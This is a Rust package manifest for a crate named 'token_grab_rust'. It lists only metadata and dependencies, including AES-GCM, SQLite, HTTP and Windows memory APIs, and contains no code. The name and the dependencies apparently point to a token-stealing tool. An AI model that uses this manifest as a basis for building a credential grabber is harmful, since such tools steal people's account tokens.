[package]
name = "token_grab_rust"
version = "0.1.0"
edition = "2021"
authors = ["VullWen" , "GoldFire94"]

[dependencies]
reqwest = { version = "0.12", features = ["json", "rustls-tls"] }
tokio = { version = "1", features = ["full"] }
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
regex = "1.7"
base64 = "0.21"
aes = "0.8"
aes-gcm = "0.10"
rand = "0.8"
rustls = "0.20"
warp = "0.3"
sysinfo = "0.26"
winapi = { version = "0.3", features = ["processthreadsapi", "handleapi", "memoryapi"] }
rusqlite = "0.31"
dirs = "5"
